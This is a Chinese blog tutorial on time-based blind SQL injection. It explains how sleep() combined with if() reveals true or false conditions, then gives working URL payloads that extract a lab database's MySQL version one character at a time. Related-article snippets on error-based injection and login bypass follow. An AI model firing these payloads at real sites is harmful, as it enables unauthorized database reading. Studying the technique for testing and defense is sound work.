首页 > 数据库 >SQL注入之延时注入

SQL注入之延时注入

时间:2023-08-23 21:02:02浏览次数:37  
标签:字符 --+ 版本号 sleep 延时 SQL ASCII 注入

延时注入是什么?

延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。

固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒

延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,为真延迟对应的秒数,为假就无延迟

延时注入获取数据库版本号

substr函数:截取字符

ascii:将截取的字符转为ASCII值进行判断

sleep:为真休眠,如果不为真,if函数返回后面的值1,and 1为真,所以会输出前面的内容。

判断版本号长度:

?id=2' and if(length(version()))=6,sleep(5),1) --+

有延时,返回为真,版本号长度为6个字符

用ASCII码判断版本号第一个字符:

?id=2' and if(ascii(substr(version(),1,1))=53,sleep(5),1) --+

有延时,返回为真,第一个字符ASCII码为53,即数字5

SQL注入之延时注入_ci

用ASCII码判断版本号第二个字符:

?id=2' and if(ascii(substr(version(),2,1))=46,sleep(5),1) --+

有延时,返回为真,第二个数字ASCII码为46,即字符.

SQL注入之延时注入_数据库_02

用ASCII码判断版本号第三个字符:

?id=2' and if(ascii(substr(version(),3,1))=53,sleep(5),1) --+

有延时,返回为真,第三个字符ASCII码为53,即数字5

SQL注入之延时注入_版本号_03

用ASCII码判断版本号第四个字符:

?id=2' and if(ascii(substr(version(),4,1))=46,sleep(5),1) --+

有延时,返回为真,第四个字符ASCII码为46,即字符.

SQL注入之延时注入_版本号_04

用ASCII码判断版本号第五个字符:

?id=2' and if(ascii(substr(version(),5,1))=53,sleep(5),1) --+

有延时,返回为真,第五个字符ASCII码为53,即数字5

SQL注入之延时注入_版本号_05

用ASCII码判断版本号第六个字符:

?id=2' and if(ascii(substr(version(),6,1))=51,sleep(5),1) --+

有延时,返回为真,第六个字符ASCII码为51,即数字3

SQL注入之延时注入_数据库_06

所以,数据库版本号为:

5.5.53

标签:字符,--+,版本号,sleep,延时,SQL,ASCII,注入
From: https://blog.51cto.com/u_16227132/7207094

相关文章

  • SQL注入之万能用户名
    分析代码在安装的cms数据库目录C:\phpStudy\WWW\cms\admin下找到login.action.php文件,查看第20行,发现如下php代码:$user_row=$db->getOneRow("selectuseridfromcms_userswhereusername='".$username."'andpassword='".md5($password)."&#......
  • PLSQL导出awr报告
    begindbms_workload_repository.create_snapshot();end;1、准备查询dbidselectdbidfromv$database;查询instance_numberselectinstance_numberfromv$instance;查询历史快照selectSNAP_ID,dbid,SNAP_LEVEL,BEGIN_INTERVAL_TIMEfromdba_hist_snapshotorderbySN......
  • 去重sql
    查找表中多余的重复记录,重复记录是根据单个字段(Id)来判断select*from表whereIdin(selectIdfrom表groupbyIdhavingcount(Id)>1)2、删除表中多余的重复记录,重复记录是根据单个字段(Id)来判断,只留有rowid最小的记录DELETEfrom表WHERE(判断字段)IN(SELECT判断......
  • SQL注入之报错注入
    报错注入是什么?在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。报错注入的原理,就是在错误信息中执行SQL语句。触发报错的方式有很多,具体细节也不尽相同。此处建议直接背公式,将公式带换掉1=1的部分。报错注入就是在判断SQL注......
  • Mysql学习
    ​Mysql​数据库(DataBase,简称DB):存储和管理数据的仓库。数据库管理系统(DataBaseManagementSystem,简称DBMS)DBMS是操作和管理数据库的大型软件。将来我们只需要操作这个软件,就可以通过这个软件来操纵和管理数据库了。此时又出现一个问题:DBMS这个软件怎么知道要操作的......
  • MySQL 入门
    0x01简介数据库(Database)是按照数据结构来组织、存储和管理数据的仓库数据库管理系统(DatabaseManagementSystem,又称DBMS)主要用于对数据库的操作与管理,是一种软件,如MySQL0x02安装配置(1)Mac使用命令brewinstallmysql下载并安装使用命令mysql.serverstart启动My......
  • SQL注入基础学习5
    SQL注入基础学习5二、靶场实操(开始先学习手工,后面的话,可以采用sqlmap等自动化工具)靶场采用sqli-labs21、第21关第21关是也是属于cookie注入的登陆后查看页面或者报头信息(如图一),会发现,输入时uname=admin1,但是页面上显示的YWRtaW4x说明被编码了,试一下bsae64解码(如图二),图......
  • MySQL 查看SQL进程和杀掉进程
    要在MySQL中查看正在执行的长时间运行的SQL语句,您可以使用SHOWPROCESSLIST命令。这个命令显示了当前MySQL服务器上正在执行的所有进程的信息,包括每个进程的ID、用户、主机、数据库、命令和执行时间等信息。SHOWFULLPROCESSLIST;使用FULL关键字可以显示完整的SQL......
  • 支持多数据源联合查询的SQL运行引擎sycnany-SQL使用类型注解和类型转换
    使用介绍安装和配置使用自定义函数sycnany-SQL作为SQL运行引擎并不需要提前定义Schema信息,而且很多数据源本身就是无Schema信息的,例如NoSQL数据库MongoDB,所以从数据源查询数据和运行计算默认直接使用输入数据的类型完成查询和计算,此时查询数据或执行计算可能因数据类型不匹配产......
  • [MySQL]递归生成数据行
    来源:https://baijiahao.baidu.com/s?id=1744215294693190607&wfr=spider&for=pc DEMO:WITHRECURSIVEcteAS( SELECT1asnUNION SELECTn+1FROMcteWHEREn<30)SELECT*FROMcte; 递归生成最近30天WITHlast30dayAS( WITHRECURSIVEcteAS( SEL......